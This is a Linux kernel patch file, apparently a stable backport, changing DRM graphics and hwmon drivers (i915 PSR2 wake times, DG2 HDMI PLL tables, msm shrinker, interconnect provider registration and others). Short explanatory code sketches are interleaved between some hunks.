+-		 * mode needs to increase IO_BUFFER_WAKE and FAST_WAKE.
+-		 */
+-		val |= TGL_EDP_PSR2_BLOCK_COUNT_NUM_2;
+-		val |= TGL_EDP_PSR2_IO_BUFFER_WAKE(7);
+-		val |= TGL_EDP_PSR2_FAST_WAKE(7);
++		val |= TGL_EDP_PSR2_IO_BUFFER_WAKE(intel_dp->psr.io_wake_lines);
++		val |= TGL_EDP_PSR2_FAST_WAKE(intel_dp->psr.fast_wake_lines);
+ 	} else if (DISPLAY_VER(dev_priv) >= 9) {
+-		val |= EDP_PSR2_IO_BUFFER_WAKE(7);
+-		val |= EDP_PSR2_FAST_WAKE(7);
++		val |= EDP_PSR2_IO_BUFFER_WAKE(intel_dp->psr.io_wake_lines);
++		val |= EDP_PSR2_FAST_WAKE(intel_dp->psr.fast_wake_lines);
+ 	}
+ 
+ 	if (intel_dp->psr.req_psr2_sdp_prior_scanline)
+@@ -843,6 +841,46 @@ static bool _compute_psr2_sdp_prior_scanline_indication(struct intel_dp *intel_d
+ 	return true;
+ }
+ 
++static bool _compute_psr2_wake_times(struct intel_dp *intel_dp,
++				     struct intel_crtc_state *crtc_state)
++{
++	struct drm_i915_private *i915 = dp_to_i915(intel_dp);
++	int io_wake_lines, io_wake_time, fast_wake_lines, fast_wake_time;
++	u8 max_wake_lines;
++
++	if (DISPLAY_VER(i915) >= 12) {
++		io_wake_time = 42;
++		/*
++		 * According to Bspec it's 42us, but based on testing
++		 * it is not enough -> use 45 us.
++		 */
++		fast_wake_time = 45;
++		max_wake_lines = 12;
++	} else {
++		io_wake_time = 50;
++		fast_wake_time = 32;
++		max_wake_lines = 8;
++	}
++
++	io_wake_lines = intel_usecs_to_scanlines(
++		&crtc_state->uapi.adjusted_mode, io_wake_time);
++	fast_wake_lines = intel_usecs_to_scanlines(
++		&crtc_state->uapi.adjusted_mode, fast_wake_time);
++
++	if (io_wake_lines > max_wake_lines ||
++	    fast_wake_lines > max_wake_lines)
++		return false;
++
++	if (i915->params.psr_safest_params)
++		io_wake_lines = fast_wake_lines = max_wake_lines;
++
++	/* According to Bspec, the lower limit should be set to 7 lines. */
++	intel_dp->psr.io_wake_lines = max(io_wake_lines, 7);
++	intel_dp->psr.fast_wake_lines = max(fast_wake_lines, 7);
++
++	return true;
++}
++
+ static bool intel_psr2_config_valid(struct intel_dp *intel_dp,
+ 				    struct intel_crtc_state *crtc_state)
+ {
+@@ -937,6 +975,12 @@ static bool intel_psr2_config_valid(struct intel_dp *intel_dp,
+ 		return false;
+ 	}
+ 
++	if (!_compute_psr2_wake_times(intel_dp, crtc_state)) {
++		drm_dbg_kms(&dev_priv->drm,
++			    "PSR2 not enabled, Unable to use long enough wake times\n");
++		return false;
++	}
++
+ 	if (HAS_PSR2_SEL_FETCH(dev_priv)) {
+ 		if (!intel_psr2_sel_fetch_config_valid(intel_dp, crtc_state) &&
+ 		    !HAS_PSR_HW_TRACKING(dev_priv)) {
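
The new _compute_psr2_wake_times() converts fixed wake times in
microseconds into scanlines for the current mode and rejects PSR2 when they
do not fit. A rough stand-alone recomputation, assuming
intel_usecs_to_scanlines() is DIV_ROUND_UP(usecs * crtc_clock_khz,
1000 * htotal); that formula and the example timing are assumptions:

#include <stdio.h>

#define DIV_ROUND_UP(n, d)	(((n) + (d) - 1) / (d))

static long usecs_to_scanlines(long crtc_clock_khz, long htotal, long usecs)
{
	return DIV_ROUND_UP(usecs * crtc_clock_khz, 1000L * htotal);
}

int main(void)
{
	/* assumed example timing: ~241.5 MHz pixel clock, htotal 2720 */
	long io = usecs_to_scanlines(241500, 2720, 50);		/* pre-TGL: 50 us */
	long fast = usecs_to_scanlines(241500, 2720, 32);	/* pre-TGL: 32 us */
	long max_wake_lines = 8;

	if (io > max_wake_lines || fast > max_wake_lines)
		return 1;		/* PSR2 rejected for this mode */
	if (io < 7)
		io = 7;			/* Bspec lower limit per the patch */
	if (fast < 7)
		fast = 7;
	printf("io_wake=%ld fast_wake=%ld\n", io, fast);
	return 0;
}
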
+diff --git a/drivers/gpu/drm/i915/display/intel_snps_phy.c b/drivers/gpu/drm/i915/display/intel_snps_phy.c
+index c799e891f8b59..4bd964a4429f7 100644
+--- a/drivers/gpu/drm/i915/display/intel_snps_phy.c
++++ b/drivers/gpu/drm/i915/display/intel_snps_phy.c
+@@ -1419,6 +1419,36 @@ static const struct intel_mpllb_state dg2_hdmi_262750 = {
+ 		REG_FIELD_PREP(SNPS_PHY_MPLLB_SSC_UP_SPREAD, 1),
+ };
+ 
++static const struct intel_mpllb_state dg2_hdmi_267300 = {
++	.clock = 267300,
++	.ref_control =
++		REG_FIELD_PREP(SNPS_PHY_REF_CONTROL_REF_RANGE, 3),
++	.mpllb_cp =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_INT, 7) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_PROP, 14) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_INT_GS, 64) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_PROP_GS, 124),
++	.mpllb_div =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_DIV5_CLK_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_TX_CLK_DIV, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_PMIX_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_V2I, 2) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FREQ_VCO, 3),
++	.mpllb_div2 =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_REF_CLK_DIV, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_MULTIPLIER, 74) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_HDMI_DIV, 1),
++	.mpllb_fracn1 =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_CGG_UPDATE_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_DEN, 65535),
++	.mpllb_fracn2 =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_QUOT, 30146) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_REM, 36699),
++	.mpllb_sscen =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_SSC_UP_SPREAD, 1),
++};
++
+ static const struct intel_mpllb_state dg2_hdmi_268500 = {
+ 	.clock = 268500,
+ 	.ref_control =
+@@ -1509,6 +1539,36 @@ static const struct intel_mpllb_state dg2_hdmi_241500 = {
+ 		REG_FIELD_PREP(SNPS_PHY_MPLLB_SSC_UP_SPREAD, 1),
+ };
+ 
++static const struct intel_mpllb_state dg2_hdmi_319890 = {
++	.clock = 319890,
++	.ref_control =
++		REG_FIELD_PREP(SNPS_PHY_REF_CONTROL_REF_RANGE, 3),
++	.mpllb_cp =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_INT, 6) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_PROP, 14) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_INT_GS, 64) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_PROP_GS, 124),
++	.mpllb_div =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_DIV5_CLK_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_TX_CLK_DIV, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_PMIX_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_V2I, 2) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FREQ_VCO, 2),
++	.mpllb_div2 =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_REF_CLK_DIV, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_MULTIPLIER, 94) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_HDMI_DIV, 1),
++	.mpllb_fracn1 =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_CGG_UPDATE_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_DEN, 65535),
++	.mpllb_fracn2 =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_QUOT, 64094) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_REM, 13631),
++	.mpllb_sscen =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_SSC_UP_SPREAD, 1),
++};
++
+ static const struct intel_mpllb_state dg2_hdmi_497750 = {
+ 	.clock = 497750,
+ 	.ref_control =
+@@ -1696,8 +1756,10 @@ static const struct intel_mpllb_state * const dg2_hdmi_tables[] = {
+ 	&dg2_hdmi_209800,
+ 	&dg2_hdmi_241500,
+ 	&dg2_hdmi_262750,
++	&dg2_hdmi_267300,
+ 	&dg2_hdmi_268500,
+ 	&dg2_hdmi_296703,
++	&dg2_hdmi_319890,
+ 	&dg2_hdmi_497750,
+ 	&dg2_hdmi_592000,
+ 	&dg2_hdmi_593407,
+diff --git a/drivers/gpu/drm/i915/gt/intel_sseu.h b/drivers/gpu/drm/i915/gt/intel_sseu.h
+index aa87d3832d60d..d7e8c374f153e 100644
+--- a/drivers/gpu/drm/i915/gt/intel_sseu.h
++++ b/drivers/gpu/drm/i915/gt/intel_sseu.h
+@@ -27,7 +27,7 @@ struct drm_printer;
+  * is only relevant to pre-Xe_HP platforms (Xe_HP and beyond use the
+  * I915_MAX_SS_FUSE_BITS value below).
+  */
+-#define GEN_MAX_SS_PER_HSW_SLICE	6
++#define GEN_MAX_SS_PER_HSW_SLICE	8
+ 
+ /*
+  * Maximum number of 32-bit registers used by hardware to express the
+diff --git a/drivers/gpu/drm/i915/i915_active.c b/drivers/gpu/drm/i915/i915_active.c
+index 7412abf166a8c..a9fea115f2d26 100644
+--- a/drivers/gpu/drm/i915/i915_active.c
++++ b/drivers/gpu/drm/i915/i915_active.c
+@@ -422,12 +422,12 @@ replace_barrier(struct i915_active *ref, struct i915_active_fence *active)
+ 	 * we can use it to substitute for the pending idle-barrer
+ 	 * request that we want to emit on the kernel_context.
+ 	 */
+-	__active_del_barrier(ref, node_from_active(active));
+-	return true;
++	return __active_del_barrier(ref, node_from_active(active));
+ }
+ 
+ int i915_active_add_request(struct i915_active *ref, struct i915_request *rq)
+ {
++	u64 idx = i915_request_timeline(rq)->fence_context;
+ 	struct dma_fence *fence = &rq->fence;
+ 	struct i915_active_fence *active;
+ 	int err;
+@@ -437,16 +437,19 @@ int i915_active_add_request(struct i915_active *ref, struct i915_request *rq)
+ 	if (err)
+ 		return err;
+ 
+-	active = active_instance(ref, i915_request_timeline(rq)->fence_context);
+-	if (!active) {
+-		err = -ENOMEM;
+-		goto out;
+-	}
++	do {
++		active = active_instance(ref, idx);
++		if (!active) {
++			err = -ENOMEM;
++			goto out;
++		}
++
++		if (replace_barrier(ref, active)) {
++			RCU_INIT_POINTER(active->fence, NULL);
++			atomic_dec(&ref->count);
++		}
++	} while (unlikely(is_barrier(active)));
+ 
+-	if (replace_barrier(ref, active)) {
+-		RCU_INIT_POINTER(active->fence, NULL);
+-		atomic_dec(&ref->count);
+-	}
+ 	if (!__i915_active_fence_set(active, fence))
+ 		__i915_active_acquire(ref);
+ 
+diff --git a/drivers/gpu/drm/meson/meson_vpp.c b/drivers/gpu/drm/meson/meson_vpp.c
+index 154837688ab0d..5df1957c8e41f 100644
+--- a/drivers/gpu/drm/meson/meson_vpp.c
++++ b/drivers/gpu/drm/meson/meson_vpp.c
+@@ -100,6 +100,8 @@ void meson_vpp_init(struct meson_drm *priv)
+ 			       priv->io_base + _REG(VPP_DOLBY_CTRL));
+ 		writel_relaxed(0x1020080,
+ 				priv->io_base + _REG(VPP_DUMMY_DATA1));
++		writel_relaxed(0x42020,
++				priv->io_base + _REG(VPP_DUMMY_DATA));
+ 	} else if (meson_vpu_is_compatible(priv, VPU_COMPATIBLE_G12A))
+ 		writel_relaxed(0xf, priv->io_base + _REG(DOLBY_PATH_CTRL));
+ 
+diff --git a/drivers/gpu/drm/msm/msm_gem_shrinker.c b/drivers/gpu/drm/msm/msm_gem_shrinker.c
+index 051bdbc093cf9..f38296ad87434 100644
+--- a/drivers/gpu/drm/msm/msm_gem_shrinker.c
++++ b/drivers/gpu/drm/msm/msm_gem_shrinker.c
+@@ -107,6 +107,7 @@ msm_gem_shrinker_scan(struct shrinker *shrinker, struct shrink_control *sc)
+ 		bool (*shrink)(struct drm_gem_object *obj);
+ 		bool cond;
+ 		unsigned long freed;
++		unsigned long remaining;
+ 	} stages[] = {
+ 		/* Stages of progressively more aggressive/expensive reclaim: */
+ 		{ &priv->lru.dontneed, purge,        true },
+@@ -116,14 +117,18 @@ msm_gem_shrinker_scan(struct shrinker *shrinker, struct shrink_control *sc)
+ 	};
+ 	long nr = sc->nr_to_scan;
+ 	unsigned long freed = 0;
++	unsigned long remaining = 0;
+ 
+ 	for (unsigned i = 0; (nr > 0) && (i < ARRAY_SIZE(stages)); i++) {
+ 		if (!stages[i].cond)
+ 			continue;
+ 		stages[i].freed =
+-			drm_gem_lru_scan(stages[i].lru, nr, stages[i].shrink);
++			drm_gem_lru_scan(stages[i].lru, nr,
++					&stages[i].remaining,
++					 stages[i].shrink);
+ 		nr -= stages[i].freed;
+ 		freed += stages[i].freed;
++		remaining += stages[i].remaining;
+ 	}
+ 
+ 	if (freed) {
+@@ -132,7 +137,7 @@ msm_gem_shrinker_scan(struct shrinker *shrinker, struct shrink_control *sc)
+ 				     stages[3].freed);
+ 	}
+ 
+-	return (freed > 0) ? freed : SHRINK_STOP;
++	return (freed > 0 && remaining > 0) ? freed : SHRINK_STOP;
+ }
+ 
+ #ifdef CONFIG_DEBUG_FS
+@@ -182,10 +187,12 @@ msm_gem_shrinker_vmap(struct notifier_block *nb, unsigned long event, void *ptr)
+ 		NULL,
+ 	};
+ 	unsigned idx, unmapped = 0;
++	unsigned long remaining = 0;
+ 
+ 	for (idx = 0; lrus[idx] && unmapped < vmap_shrink_limit; idx++) {
+ 		unmapped += drm_gem_lru_scan(lrus[idx],
+ 					     vmap_shrink_limit - unmapped,
++					     &remaining,
+ 					     vmap_shrink);
+ 	}
+ 
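The msm_gem_shrinker hunks above rely on the shrinker-core convention that
SHRINK_STOP means "calling this scan again right now is pointless": by summing
the new remaining out-parameter of drm_gem_lru_scan() across the reclaim
stages, the driver keeps reporting progress while evictable objects are left
and returns SHRINK_STOP once the LRUs are exhausted. A minimal sketch of that
contract, with hypothetical names (demo_lru and demo_purge stand in for a
driver's real LRU and eviction callback, not code from this patch):

/* Hypothetical scan callback: report freed objects while work remains,
 * and SHRINK_STOP once the LRU is empty so vmscan stops re-invoking it.
 */
static struct drm_gem_lru demo_lru;		/* assumed initialized elsewhere */
static bool demo_purge(struct drm_gem_object *obj);

static unsigned long demo_scan(struct shrinker *shrinker,
			       struct shrink_control *sc)
{
	unsigned long remaining = 0;
	unsigned long freed;

	freed = drm_gem_lru_scan(&demo_lru, sc->nr_to_scan,
				 &remaining, demo_purge);

	return (freed > 0 && remaining > 0) ? freed : SHRINK_STOP;
}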
+diff --git a/drivers/gpu/drm/panfrost/panfrost_mmu.c b/drivers/gpu/drm/panfrost/panfrost_mmu.c
+index 4e83a1891f3ed..666a5e53fe193 100644
+--- a/drivers/gpu/drm/panfrost/panfrost_mmu.c
++++ b/drivers/gpu/drm/panfrost/panfrost_mmu.c
+@@ -282,7 +282,7 @@ static void panfrost_mmu_flush_range(struct panfrost_device *pfdev,
+ 	if (pm_runtime_active(pfdev->dev))
+ 		mmu_hw_do_operation(pfdev, mmu, iova, size, AS_COMMAND_FLUSH_PT);
+ 
+-	pm_runtime_put_sync_autosuspend(pfdev->dev);
++	pm_runtime_put_autosuspend(pfdev->dev);
+ }
+ 
+ static int mmu_map_sg(struct panfrost_device *pfdev, struct panfrost_mmu *mmu,
+diff --git a/drivers/gpu/drm/sun4i/sun4i_drv.c b/drivers/gpu/drm/sun4i/sun4i_drv.c
+index cc94efbbf2d4e..d6c741716167a 100644
+--- a/drivers/gpu/drm/sun4i/sun4i_drv.c
++++ b/drivers/gpu/drm/sun4i/sun4i_drv.c
+@@ -95,12 +95,12 @@ static int sun4i_drv_bind(struct device *dev)
+ 	/* drm_vblank_init calls kcalloc, which can fail */
+ 	ret = drm_vblank_init(drm, drm->mode_config.num_crtc);
+ 	if (ret)
+-		goto cleanup_mode_config;
++		goto unbind_all;
+ 
+ 	/* Remove early framebuffers (i.e. simplefb) */
+ 	ret = drm_aperture_remove_framebuffers(false, &sun4i_drv_driver);
+ 	if (ret)
+-		goto cleanup_mode_config;
++		goto unbind_all;
+ 
+ 	sun4i_framebuffer_init(drm);
+ 
+@@ -119,6 +119,8 @@ static int sun4i_drv_bind(struct device *dev)
+ 
+ finish_poll:
+ 	drm_kms_helper_poll_fini(drm);
++unbind_all:
++	component_unbind_all(dev, NULL);
+ cleanup_mode_config:
+ 	drm_mode_config_cleanup(drm);
+ 	of_reserved_mem_device_release(dev);
+diff --git a/drivers/gpu/drm/ttm/ttm_device.c b/drivers/gpu/drm/ttm/ttm_device.c
+index e7147e3046378..b84f74807ca13 100644
+--- a/drivers/gpu/drm/ttm/ttm_device.c
++++ b/drivers/gpu/drm/ttm/ttm_device.c
+@@ -158,7 +158,7 @@ int ttm_device_swapout(struct ttm_device *bdev, struct ttm_operation_ctx *ctx,
+ 			struct ttm_buffer_object *bo = res->bo;
+ 			uint32_t num_pages;
+ 
+-			if (!bo)
++			if (!bo || bo->resource != res)
+ 				continue;
+ 
+ 			num_pages = PFN_UP(bo->base.size);
+diff --git a/drivers/gpu/drm/virtio/virtgpu_vq.c b/drivers/gpu/drm/virtio/virtgpu_vq.c
+index 9ff8660b50ade..208e9434cb28d 100644
+--- a/drivers/gpu/drm/virtio/virtgpu_vq.c
++++ b/drivers/gpu/drm/virtio/virtgpu_vq.c
+@@ -597,7 +597,7 @@ void virtio_gpu_cmd_transfer_to_host_2d(struct virtio_gpu_device *vgdev,
+ 	bool use_dma_api = !virtio_has_dma_quirk(vgdev->vdev);
+ 
+ 	if (virtio_gpu_is_shmem(bo) && use_dma_api)
+-		dma_sync_sgtable_for_device(&vgdev->vdev->dev,
++		dma_sync_sgtable_for_device(vgdev->vdev->dev.parent,
+ 					    bo->base.sgt, DMA_TO_DEVICE);
+ 
+ 	cmd_p = virtio_gpu_alloc_cmd(vgdev, &vbuf, sizeof(*cmd_p));
+@@ -1019,7 +1019,7 @@ void virtio_gpu_cmd_transfer_to_host_3d(struct virtio_gpu_device *vgdev,
+ 	bool use_dma_api = !virtio_has_dma_quirk(vgdev->vdev);
+ 
+ 	if (virtio_gpu_is_shmem(bo) && use_dma_api)
+-		dma_sync_sgtable_for_device(&vgdev->vdev->dev,
++		dma_sync_sgtable_for_device(vgdev->vdev->dev.parent,
+ 					    bo->base.sgt, DMA_TO_DEVICE);
+ 
+ 	cmd_p = virtio_gpu_alloc_cmd(vgdev, &vbuf, sizeof(*cmd_p));
+diff --git a/drivers/hwmon/adt7475.c b/drivers/hwmon/adt7475.c
+index 51b3d16c32233..6e4c92b500b8e 100644
+--- a/drivers/hwmon/adt7475.c
++++ b/drivers/hwmon/adt7475.c
+@@ -488,10 +488,10 @@ static ssize_t temp_store(struct device *dev, struct device_attribute *attr,
+ 		val = (temp - val) / 1000;
+ 
+ 		if (sattr->index != 1) {
+-			data->temp[HYSTERSIS][sattr->index] &= 0xF0;
++			data->temp[HYSTERSIS][sattr->index] &= 0x0F;
+ 			data->temp[HYSTERSIS][sattr->index] |= (val & 0xF) << 4;
+ 		} else {
+-			data->temp[HYSTERSIS][sattr->index] &= 0x0F;
++			data->temp[HYSTERSIS][sattr->index] &= 0xF0;
+ 			data->temp[HYSTERSIS][sattr->index] |= (val & 0xF);
+ 		}
+ 
+@@ -556,11 +556,11 @@ static ssize_t temp_st_show(struct device *dev, struct device_attribute *attr,
+ 		val = data->enh_acoustics[0] & 0xf;
+ 		break;
+ 	case 1:
+-		val = (data->enh_acoustics[1] >> 4) & 0xf;
++		val = data->enh_acoustics[1] & 0xf;
+ 		break;
+ 	case 2:
+ 	default:
+-		val = data->enh_acoustics[1] & 0xf;
++		val = (data->enh_acoustics[1] >> 4) & 0xf;
+ 		break;
+ 	}
+ 
+diff --git a/drivers/hwmon/ina3221.c b/drivers/hwmon/ina3221.c
+index e06186986444e..f3a4c5633b1ea 100644
+--- a/drivers/hwmon/ina3221.c
++++ b/drivers/hwmon/ina3221.c
+@@ -772,7 +772,7 @@ static int ina3221_probe_child_from_dt(struct device *dev,
+ 		return ret;
+ 	} else if (val > INA3221_CHANNEL3) {
+ 		dev_err(dev, "invalid reg %d of %pOFn\n", val, child);
+-		return ret;
++		return -EINVAL;
+ 	}
+ 
+ 	input = &ina->inputs[val];
+diff --git a/drivers/hwmon/ltc2992.c b/drivers/hwmon/ltc2992.c
+index 88514152d9306..69341de397cb9 100644
+--- a/drivers/hwmon/ltc2992.c
++++ b/drivers/hwmon/ltc2992.c
+@@ -323,6 +323,7 @@ static int ltc2992_config_gpio(struct ltc2992_state *st)
+ 	st->gc.label = name;
+ 	st->gc.parent = &st->client->dev;
+ 	st->gc.owner = THIS_MODULE;
++	st->gc.can_sleep = true;
+ 	st->gc.base = -1;
+ 	st->gc.names = st->gpio_names;
+ 	st->gc.ngpio = ARRAY_SIZE(st->gpio_names);
+diff --git a/drivers/hwmon/pmbus/adm1266.c b/drivers/hwmon/pmbus/adm1266.c
+index ec5f932fc6f0f..1ac2b2f4c5705 100644
+--- a/drivers/hwmon/pmbus/adm1266.c
++++ b/drivers/hwmon/pmbus/adm1266.c
+@@ -301,6 +301,7 @@ static int adm1266_config_gpio(struct adm1266_data *data)
+ 	data->gc.label = name;
+ 	data->gc.parent = &data->client->dev;
+ 	data->gc.owner = THIS_MODULE;
++	data->gc.can_sleep = true;
+ 	data->gc.base = -1;
+ 	data->gc.names = data->gpio_names;
+ 	data->gc.ngpio = ARRAY_SIZE(data->gpio_names);
+diff --git a/drivers/hwmon/pmbus/ucd9000.c b/drivers/hwmon/pmbus/ucd9000.c
+index 75fc770c9e403..3daaf22378322 100644
+--- a/drivers/hwmon/pmbus/ucd9000.c
++++ b/drivers/hwmon/pmbus/ucd9000.c
+@@ -7,6 +7,7 @@
+  */
+ 
+ #include <linux/debugfs.h>
++#include <linux/delay.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+ #include <linux/of_device.h>
+@@ -16,6 +17,7 @@
+ #include <linux/i2c.h>
+ #include <linux/pmbus.h>
+ #include <linux/gpio/driver.h>
++#include <linux/timekeeping.h>
+ #include "pmbus.h"
+ 
+ enum chips { ucd9000, ucd90120, ucd90124, ucd90160, ucd90320, ucd9090,
+@@ -65,6 +67,7 @@ struct ucd9000_data {
+ 	struct gpio_chip gpio;
+ #endif
+ 	struct dentry *debugfs;
++	ktime_t write_time;
+ };
+ #define to_ucd9000_data(_info) container_of(_info, struct ucd9000_data, info)
+ 
+@@ -73,6 +76,73 @@ struct ucd9000_debugfs_entry {
+ 	u8 index;
+ };
+ 
++/*
++ * It has been observed that the UCD90320 randomly fails register access when
++ * doing another access right on the back of a register write. To mitigate this,
++ * make sure that there is a minimum delay between a write access and the
++ * following access. The 250us is based on experimental data. At a delay of
++ * 200us the issue seems to go away. Add a bit of extra margin to allow for
++ * system-to-system differences.
++ */
++#define UCD90320_WAIT_DELAY_US 250
++
++static inline void ucd90320_wait(const struct ucd9000_data *data)
++{
++	s64 delta = ktime_us_delta(ktime_get(), data->write_time);
++
++	if (delta < UCD90320_WAIT_DELAY_US)
++		udelay(UCD90320_WAIT_DELAY_US - delta);
++}
++
++static int ucd90320_read_word_data(struct i2c_client *client, int page,
++				   int phase, int reg)
++{
++	const struct pmbus_driver_info *info = pmbus_get_driver_info(client);
++	struct ucd9000_data *data = to_ucd9000_data(info);
++
++	if (reg >= PMBUS_VIRT_BASE)
++		return -ENXIO;
++
++	ucd90320_wait(data);
++	return pmbus_read_word_data(client, page, phase, reg);
++}
++
++static int ucd90320_read_byte_data(struct i2c_client *client, int page, int reg)
++{
++	const struct pmbus_driver_info *info = pmbus_get_driver_info(client);
++	struct ucd9000_data *data = to_ucd9000_data(info);
++
++	ucd90320_wait(data);
++	return pmbus_read_byte_data(client, page, reg);
++}
++
++static int ucd90320_write_word_data(struct i2c_client *client, int page,
++				    int reg, u16 word)
++{
++	const struct pmbus_driver_info *info = pmbus_get_driver_info(client);
++	struct ucd9000_data *data = to_ucd9000_data(info);
++	int ret;
++
++	ucd90320_wait(data);
++	ret = pmbus_write_word_data(client, page, reg, word);
++	data->write_time = ktime_get();
++
++	return ret;
++}
++
++static int ucd90320_write_byte(struct i2c_client *client, int page, u8 value)
++{
++	const struct pmbus_driver_info *info = pmbus_get_driver_info(client);
++	struct ucd9000_data *data = to_ucd9000_data(info);
++	int ret;
++
++	ucd90320_wait(data);
++	ret = pmbus_write_byte(client, page, value);
++	data->write_time = ktime_get();
++
++	return ret;
++}
++
+ static int ucd9000_get_fan_config(struct i2c_client *client, int fan)
+ {
+ 	int fan_config = 0;
+@@ -598,6 +668,11 @@ static int ucd9000_probe(struct i2c_client *client)
+ 		info->read_byte_data = ucd9000_read_byte_data;
+ 		info->func[0] |= PMBUS_HAVE_FAN12 | PMBUS_HAVE_STATUS_FAN12
+ 		  | PMBUS_HAVE_FAN34 | PMBUS_HAVE_STATUS_FAN34;
++	} else if (mid->driver_data == ucd90320) {
++		info->read_byte_data = ucd90320_read_byte_data;
++		info->read_word_data = ucd90320_read_word_data;
++		info->write_byte = ucd90320_write_byte;
++		info->write_word_data = ucd90320_write_word_data;
+ 	}
+ 
+ 	ucd9000_probe_gpio(client, mid, data);
+diff --git a/drivers/hwmon/tmp513.c b/drivers/hwmon/tmp513.c
+index 47bbe47e062fd..7d5f7441aceb1 100644
+--- a/drivers/hwmon/tmp513.c
++++ b/drivers/hwmon/tmp513.c
+@@ -758,7 +758,7 @@ static int tmp51x_probe(struct i2c_client *client)
+ static struct i2c_driver tmp51x_driver = {
+ 	.driver = {
+ 		.name	= "tmp51x",
+-		.of_match_table = of_match_ptr(tmp51x_of_match),
++		.of_match_table = tmp51x_of_match,
+ 	},
+ 	.probe_new	= tmp51x_probe,
+ 	.id_table	= tmp51x_id,
+diff --git a/drivers/hwmon/xgene-hwmon.c b/drivers/hwmon/xgene-hwmon.c
+index 5cde837bfd094..d1abea49f01be 100644
+--- a/drivers/hwmon/xgene-hwmon.c
++++ b/drivers/hwmon/xgene-hwmon.c
+@@ -761,6 +761,7 @@ static int xgene_hwmon_remove(struct platform_device *pdev)
+ {
+ 	struct xgene_hwmon_dev *ctx = platform_get_drvdata(pdev);
+ 
++	cancel_work_sync(&ctx->workq);
+ 	hwmon_device_unregister(ctx->hwmon_dev);
+ 	kfifo_free(&ctx->async_msg_fifo);
+ 	if (acpi_disabled)
+diff --git a/drivers/interconnect/core.c b/drivers/interconnect/core.c
+index 25debded65a8f..cfa52c6369d05 100644
+--- a/drivers/interconnect/core.c
++++ b/drivers/interconnect/core.c
+@@ -850,6 +850,10 @@ void icc_node_destroy(int id)
+ 
+ 	mutex_unlock(&icc_lock);
+ 
++	if (!node)
++		return;
++
++	kfree(node->links);
+ 	kfree(node);
+ }
+ EXPORT_SYMBOL_GPL(icc_node_destroy);
+@@ -1029,54 +1033,68 @@ int icc_nodes_remove(struct icc_provider *provider)
+ EXPORT_SYMBOL_GPL(icc_nodes_remove);
+ 
+ /**
+- * icc_provider_add() - add a new interconnect provider
+- * @provider: the interconnect provider that will be added into topology
++ * icc_provider_init() - initialize a new interconnect provider
++ * @provider: the interconnect provider to initialize
++ *
++ * Must be called before adding nodes to the provider.
++ */
++void icc_provider_init(struct icc_provider *provider)
++{
++	WARN_ON(!provider->set);
++
++	INIT_LIST_HEAD(&provider->nodes);
++}
++EXPORT_SYMBOL_GPL(icc_provider_init);
++
++/**
++ * icc_provider_register() - register a new interconnect provider
++ * @provider: the interconnect provider to register
+  *
+  * Return: 0 on success, or an error code otherwise
+  */
+-int icc_provider_add(struct icc_provider *provider)
++int icc_provider_register(struct icc_provider *provider)
+ {
+-	if (WARN_ON(!provider->set))
+-		return -EINVAL;
+ 	if (WARN_ON(!provider->xlate && !provider->xlate_extended))
+ 		return -EINVAL;
+ 
+ 	mutex_lock(&icc_lock);
+-
+-	INIT_LIST_HEAD(&provider->nodes);
+ 	list_add_tail(&provider->provider_list, &icc_providers);
+-
+ 	mutex_unlock(&icc_lock);
+ 
+-	dev_dbg(provider->dev, "interconnect provider added to topology\n");
++	dev_dbg(provider->dev, "interconnect provider registered\n");
+ 
+ 	return 0;
+ }
+-EXPORT_SYMBOL_GPL(icc_provider_add);
++EXPORT_SYMBOL_GPL(icc_provider_register);
+ 
+ /**
+- * icc_provider_del() - delete previously added interconnect provider
+- * @provider: the interconnect provider that will be removed from topology
++ * icc_provider_deregister() - deregister an interconnect provider
++ * @provider: the interconnect provider to deregister
+  */
+-void icc_provider_del(struct icc_provider *provider)
++void icc_provider_deregister(struct icc_provider *provider)
+ {
+ 	mutex_lock(&icc_lock);
+-	if (provider->users) {
+-		pr_warn("interconnect provider still has %d users\n",
+-			provider->users);
+-		mutex_unlock(&icc_lock);
+-		return;
+-	}
+-
+-	if (!list_empty(&provider->nodes)) {
+-		pr_warn("interconnect provider still has nodes\n");
+-		mutex_unlock(&icc_lock);
+-		return;
+-	}
++	WARN_ON(provider->users);
+ 
+ 	list_del(&provider->provider_list);
+ 	mutex_unlock(&icc_lock);
+ }
